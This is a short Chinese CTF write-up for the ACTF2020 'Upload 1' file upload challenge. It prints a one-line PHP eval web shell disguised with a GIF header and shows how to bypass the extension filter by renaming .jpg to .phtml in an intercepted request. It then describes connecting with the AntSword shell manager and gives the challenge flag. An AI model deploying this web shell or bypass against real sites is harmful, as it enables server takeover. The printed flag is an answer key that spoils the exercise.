[ACTF2020 新生赛]Upload 1

2023-11-08 10:23:50 浏览数 (2)

题目环境:

仍旧是文件上传漏洞

这道题和上一道大差不差、大同小异、这里不再赘述。 [极客大挑战 2019]Upload 1:https://blog.csdn.net/m0_73734159/article/details/134267317?spm=1001.2014.3001.5501 区别在于本题需要在抓包数据里面改文件后缀,在外部改是不行的 这两道题可以对比进行研究

编写一语句木马脚本 GIF89a<script language="php">@eval($_POST['shell']);</script> 文件命名为flag.jpg

上传文件并进行抓包

在抓包数据里面进行修改文件后缀将flag.jpg修改为flag.phtml 记住原文件不要动只在数据包里面修改,不然的话是绕不过的!!!

Repeater重放Send 成功上传

访问上传的文件

此时已经可以进行蚁剑连接了 复制URL进行蚁剑连接

在/根目录下找到flag文件

访问flag文件

得到flag: flag{9c59f5e5-7dd6-48fa-90f0-dae0ab50e190}

0 人点赞